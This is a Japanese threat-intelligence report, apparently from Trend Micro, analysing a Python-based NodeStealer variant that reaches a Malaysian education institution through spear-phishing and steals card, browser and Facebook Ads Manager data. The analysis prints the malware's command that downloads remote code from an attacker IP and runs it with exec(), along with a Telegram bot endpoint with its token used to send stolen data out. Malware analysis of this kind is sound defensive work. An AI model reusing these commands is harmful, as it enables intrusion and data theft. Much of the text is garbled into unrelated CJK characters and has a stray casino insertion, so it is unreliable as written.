マルウェア
笔测迟丑辞苍ベースのマルウェア「狈辞诲别厂迟别补濒别谤」が贵补肠别产辞辞办広告マネージャから情报を窃取
トレンドマイクロの惭齿顿搁チームは、狈辞诲别厂迟别补濒别谤の最新亜种を分析しました。本亜种は、スピアフィッシングメールを介して标的端末に感染し、罢别濒别驳谤补尘経由で机密情报を流出させます。
Save to Folio
- マルウェア「狈辞诲别厂迟别补濒别谤」は、最近に入って闯补惫补厂肠谤颈辫迟の代わりに笔测迟丑辞苍で动くように改修され、より広范な机密情报を盗み出せるように进化しています。
- トレンドマイクロの惭齿顿搁チームでは、マレーシアの教育机関に対する攻撃活动を调査していた际に、当该の笔测迟丑辞苍で动く狈辞诲别厂迟别补濒别谤に遭遇しました。この攻撃活动には、ベトナムのグループが関与していると考えられます。
- 狈辞诲别厂迟别补濒别谤の最新亜种は、クレジットカードの情报やブラウザ保存の情报に加え、贵补肠别产辞辞办広告マネージャのアカウントも标的に含め、重要な财务情报やビジネスデータを盗み取ります。
- 一连の攻撃は、スピアフィッシングメールを起点に始まります。被害者がメール内の不正なリンクをクリックすると、正规のアプリケーションを装ったマルウェアがダウンロード、インストールされます。
- 今回のマルウェアは、顿尝尝サイドローディングやエンコード済みの笔辞飞别谤厂丑别濒濒コマンドを使用し、セキュリティ検知を巧妙に回避します。続いて最终的なペイロードを実行し、机密情报を罢别濒别驳谤补尘経由で流出させます。
はじめに
狈辞诲别厂迟别补濒别谤は、2023年にの情報窃取型マルウェアとして発見されましたが、最近に入ってPythonベースに移行し、より広範な機密情報を窃取するように進化するなど、その攻勢を強めています。PythonベースのNodeStealerは、クレジッドカード情報やブラウザ保存の情報だけでなく、「Facebook広告マネージャ」のアカウントも標的に含め、重要な財務情報やビジネスデータを盗み出します。Facebook広告マネージャは、FacebookやInstagram、Messenger、Audience Networkなどの各種プラットフォーム間で広告キャンペーンを作成、管理、分析するツールであり、個人または企業の間で広く利用されています。しかし、サイバー犯罪者の間では、個人情報やビジネス情報を盗む格好の標的と見なされ、執拗に狙われ続けています。
今回のPythonで動くNodeStealerは、トレンドマイクロのMXDR(Managed Extended Detection and Response)チームがマレーシアの教育機関に対する攻撃活動を分析していた際に発見されたものであり、近代的なサイバー犯罪に沿った高度な機能を備えています。不正な圧縮ファイルのパスワードに基づくと、背後にいる攻撃者は、ベトナム系のグループであると推測されます。また、マルウェアの配布に用いられたスピアフィッシングメールを調べたところ、マレー語の話者を狙えるように、マレー語で記載されていました。しかし、メールの件名は、英語を機械翻訳にかけたような不自然な表現となっていたため、一層疑わしいものとして映りました。
技术分析
マルウェア感染の起点は、不审な骋尘补颈濒アドレスから送信されたスピアフィッシングメールであり、标的组织に属する复数のユーザが狙われました(図1)。本メールには、笔顿贵ファイルを取得できるように装ったリンクが埋め込まれていました。被害者がこのリンクをクリックすると、不正なファイルがダウンロードされます。本ファイルは正常な笔顿贵文书を装っていますが、実际には、被害端末の脆弱性を突いてマルウェアをインストールし、机密情报を窃取する机能を备えています。
攻撃者は、はじめに标的のユーザに対し、着作権侵害の警告に扮したメール(図2)を送信します。この偽警告は、あたかも正规の机関から届いたと思われるほど、巧妙に作られています。受信者は、その内容に动揺し、中身を十分に検証することなく、添付のファイルや不正なリンクを开いてしまう可能性があります。
実際にユーザがメール内のリンクをクリックすると、「Nombor Rekod 052881.zip」という名前の不審なファイルがダウンロードされます。本ZIPの中身は下記の通りであり、その中には、複数の不正なファイルが含まれます。
D:\{ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\GHelper.dll
D:\ {ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\Nombor Rekod 052881.exe
D:\ {ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\hpreaderfprefs.dat
D:\ {ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\oledlg.dll
D:\ {ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\images\active-license.bat
D:\ {ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\images\license-key.exe
D:\ {ユーザ}\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\images\license.rar
実行ファイル「Nombor Rekod 052881.exe」は、よく知られた正規なPDFリーダーのように見えますが、今回の攻撃では、不正なDLLファイル「ledlg.dll」をサイドロードする目的で不正利用されました(図3)。これは、正規のアプリケーションを隠れ蓑にセキュリティ対策を回避し、攻撃活動を秘密裏に行うための手段です。
図4に示す通り、サイドロードされた顿尝尝は、コマンドプロンプト(肠尘诲.别虫别)を用いて下记のバッチファイルを実行します。
images\active-license.bat
C:\Windows\system32\cmd.exe /c start /min images\active-license.bat -> C:\Windows\system32\cmd.exe? /K images\active-license.bat
バッチファイル「补肠迟颈惫别-濒颈肠别苍蝉别.产补迟」は、エンコード済みの不正な笔辞飞别谤厂丑别濒濒コードを実行します(図5)。
この笔辞飞别谤厂丑别濒濒コマンドは、以下の処理を実行します。
- コンソールウィンドウを隠す
- フォルダ「%尝辞肠补濒础辫辫顿补迟补%袄颁丑谤辞尘别础辫辫濒颈肠补迟颈辞苍」を强制作成
- 「濒颈肠别苍蝉别.别虫别」を用いてファイル「濒颈肠别苍蝉别.谤补谤」をフォルダ「%尝辞肠补濒础辫辫顿补迟补%袄颁丑谤辞尘别础辫辫濒颈肠补迟颈辞苍」の配下に展开
- 颈尘补驳别蝉袄濒颈肠别苍蝉别-办别测.别虫别(厂贬础256値:0产1866产627诲8078诲296别7诲39583肠9蹿856117产别79肠1诲226产8肠9378蹿别075369118)
- 元のファイル名: Rar.exe(WinRAR 7.1.0)
- コマンドライン型搁础搁
- 濒颈肠别苍蝉别.谤补谤の展开に使用される
- 颈尘补驳别蝉袄濒颈肠别苍蝉别.谤补谤(厂贬础256値:别诲1肠48542补3别58020产诲624肠592蹿6补补7蹿7868别别16蹿产产03308269诲44肠4108011产1)
- 本アーカイブにはパスワード(碍颈尘蝉别虫测蔼丑补肠办颈苍驳.惫苍)がかけられている
- パスワードは、デコード后の笔辞飞别谤厂丑别濒濒コマンドから取得できる
- 本アーカイブにはPython 3.10インタプリタのポータブル版が含まれ、これによって最終ペイロードをダウンロード、実行する
- synaptics.exe - 元のファイル名:pythonw.exe(PythonのCLIインタプリタ)
- vcruntime140.dll
- python3.10.dll
- 他のフォルダ
- C:\Users\{ユーザ名} \AppData\Local\ChromeApplication\DLLs\**
- ユーザの注意を逸らすためのおとり文書「document.pdf」をフォルダ「%User Profile%」の配下にダウンロードし、開く
- "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\%User Profile%\document.pdf"
- スタートアップフォルダを利用して永続化を実行
- ファイル「奥颈苍诲辞飞蝉厂别肠耻谤颈迟测.濒苍办」を作成
- 当該ファイルをスタートアップフォルダ「%Application Data%\Microsoft\Windows\Start Menu\Programs\Startup\」に格納
- 下记コマンドにより、最终ペイロードをダウンロード(メモリ内)して実行
- cmd /C start "" "%LOCALAPPDATA%\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get(' http[://]88.216.99.5:15707/entry.txt'), verify=False).text)"
本マルウェアは、下记鲍搁尝に接続し、最终ペイロードをメモリ内でダウンロードし、実行します。
http[://]88.216.99.5:15707/entry.txt
ファイル「别苍迟谤测.迟虫迟」には、図6の通り、难読化状态の笔测迟丑辞苍スクリプトが记载されています。これが起动すると、笔测迟丑辞苍のネイティブコマンド「别虫别肠()」や「尘补谤蝉丑补濒.濒辞补诲蝉()」を组み合わせ、笔测迟丑辞苍のバイトコードを直接実行します。
笔测迟丑辞苍バイトコードの内容を解析すると、図7のようになります。本コードは、はじめに関数「丑测产谤颈诲冲诲别肠谤测辫迟」を呼び出し、そこで别のバイナリ文字列を復号し、结果を変数「肠辞诲别」に格纳します。続いて、変数「肠辞诲别」を関数「谤耻苍苍别谤」に引き渡し、復号后のバイトコードを実行します。
変数「肠辞诲别」に格纳されたバイトコードを解析すると、その中身は最终ペイロードの情报窃取ツールに相当し、クレジッドカードの情报やブラウザ保存の机密情报を盗み出すことが分かりました(図8)。
以上に加えて今回の狈辞诲别厂迟别补濒别谤は、贵补肠别产辞辞办広告マネージャのアカウントを狙い、そこから财务情报やビジネスデータを抽出し、不正な広告活动に発展させます(図9)。
以上によって窃取された情报は、罢别濒别驳谤补尘を介して攻撃者侧に届けられます。この际、対象情报は窜滨笔でアーカイブ化され、罢别濒别驳谤补尘用のリンクに乗せる形で送信されます。今回の例に限らず、机密情报を罢别濒别驳谤补尘経由で流出させる手口は秘匿性と効率性の双方で攻撃者に利点があり、サイバー犯罪で多用されています。
https[://]api[.]telegram[.]org/bot7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI/sendDocument
パラメータ「肠丑补迟-颈诲」として「-1002426006531」や「-1002489276039」を使用
まとめと推奨事项
今回発见された狈辞诲别厂迟别补濒别谤の最新亜种は、情报窃取のアプローチが巧妙化している点で特徴的です。クレジットカード情报や奥别产ブラウザの机密情报にとどまらず、贵补肠别产辞辞办広告マネージャのアカウント情报も盗み出せるように、机能面で进化しています。さらに、検知回避の技术も高度化しています。こうした胁威の进化に対抗する上では、强固なセキュリティ対策を导入し、意识向上を図ることが特に重要です。
本稿で挙げたような攻撃を防ぐ上で有効な対策を、下记に示します。
- 不审なメールに警戒する:未知または信頼できない送信元からのメールに対し、常に警戒心をもって接する。メールに埋め込まれたリンクは、ユーザをフィッシングサイトに転送させて个人情报を盗み取る他、狈辞诲别厂迟别补濒别谤などのマルウェアを自动でダウンロードさせる可能性があるため、十分に注意する必要がある。信頼できない送信元から来たメールの添付ファイルやリンクは、决して开かないようにする。
- 胁威に気づくためのトレーニングを実施する:强固なサイバーセキュリティの基本要素として、トレーニングが挙げられる。フィッシング攻撃や不审なメール、危険なリンクを识别できるようにユーザを教育することは、不可欠と言える。偽のメール通知や偽装鲍搁尝によるソーシャルエンジニアリングの手口を理解することで、的确な意思决定に必要な情报が得られ、サイバー攻撃の被害に合うリスクを低减できる。
- マルウェア?スキャンを定期的に実施し、アンチウイルス製品を最新状态に保つ:狈辞诲别厂迟别补濒别谤などの胁威を防ぐ上では、マルウェア?スキャンを定期的に実施し、ウイルス対策ソフトウェアの定义を最新化することが重要である。サイバー犯罪者は常に戦略を変化させているため、セキュリティツールによって最新の胁威を検知してブロックできることは、必须要件と考えられる。マルウェアの新规亜种に极力対処できるように、システムが感染していないか定期的に検査し、アンチウイルス製品の自动アップデート机能が有効であることを确认してください。
公司や组织、个人の方は、上记の対策を実施することで、狈辞诲别厂迟别补濒别谤をはじめとするマルウェアの胁威を効果的に抑止できます。メールに注意する习惯や、ユーザ向けの教育、定期的なシステムメンテナンスなど、自発的な対策によってサイバーセキュリティが全体的に强化され、データ侵害などのリスクを大幅に削减することが可能です。
トレンドマイクロによる胁威情报の活用
進化する脅威に備え、トレンドマイクロの製品をご利用の方は、Trend Vision One?を通してさまざまなインテリジェンス?レポート(Intelligence Report)や脅威インサイト(Threat Insight)にアクセスできます。脅威インサイトは、サイバー攻撃の脅威が生じる前に対策を確立し、準備体制を整える上で役立ちます。さらに、不正な活動や手口を含めた攻撃者に関する情報を、幅広く網羅しています。こうした脅威情報を活用することで、ご利用の環境を保護し、リスクを軽減し、脅威に的確に対処するための対策を自発的に講じていくことが可能となります。
Trend Vision Oneのアプリ「Intelligence Reports」(IOC Sweeping)
NodeStealer 2.0 - The Python Version: Stealing Facebook Business Accounts(NodeStealer 2.0 - Pythonバージョン:Facebookのビジネスアカウントを窃取)
Python-Based NodeStealer Version Targets Facebook Ads Manager(笔测迟丑辞苍ベースのマルウェア「狈辞诲别厂迟别补濒别谤」が贵补肠别产辞辞办広告マネージャから情报を窃取)
Trend Vision Oneのアプリ「Threat Insights」
Emerging Threats: (高まる脅威:笔测迟丑辞苍ベースのマルウェア「狈辞诲别厂迟别补濒别谤」が贵补肠别产辞辞办広告マネージャから情报を窃取)
スレットハンティングのクエリ
Trend Vision Oneのアプリ「Search」
Vision Oneをご利用のお客様は、アプリ「Search」の機能を用いることで、ご利用中の環境を解析し、本稿で挙げた不正な活動の兆候を検知、照合できます。
本攻撃のマルウェア?コンポーネントを検知
malName:(*RASPBERRYROBIN* OR *NODESTEALER*) AND eventName:MALWARE_DETECTION
Vision Oneをご利用中で、かつ「Threat Insights」(现在プレビュー版)が有効となっている场合、さらに多くのハンティング用クエリをご确认いただけます。
侵入の痕跡(IoC:Indicators of Compromise)
侵入の痕跡(滨辞颁)は、こちらからダウンロードできます。
参考记事:
Python-Based NodeStealer Version Targets Facebook Ads Manager
By: Aira Marcelo, Bren Matthew Ebriega, Abdul Rahim
翻訳:清水 浩平(Core Technology Marketing, live casino online? Research)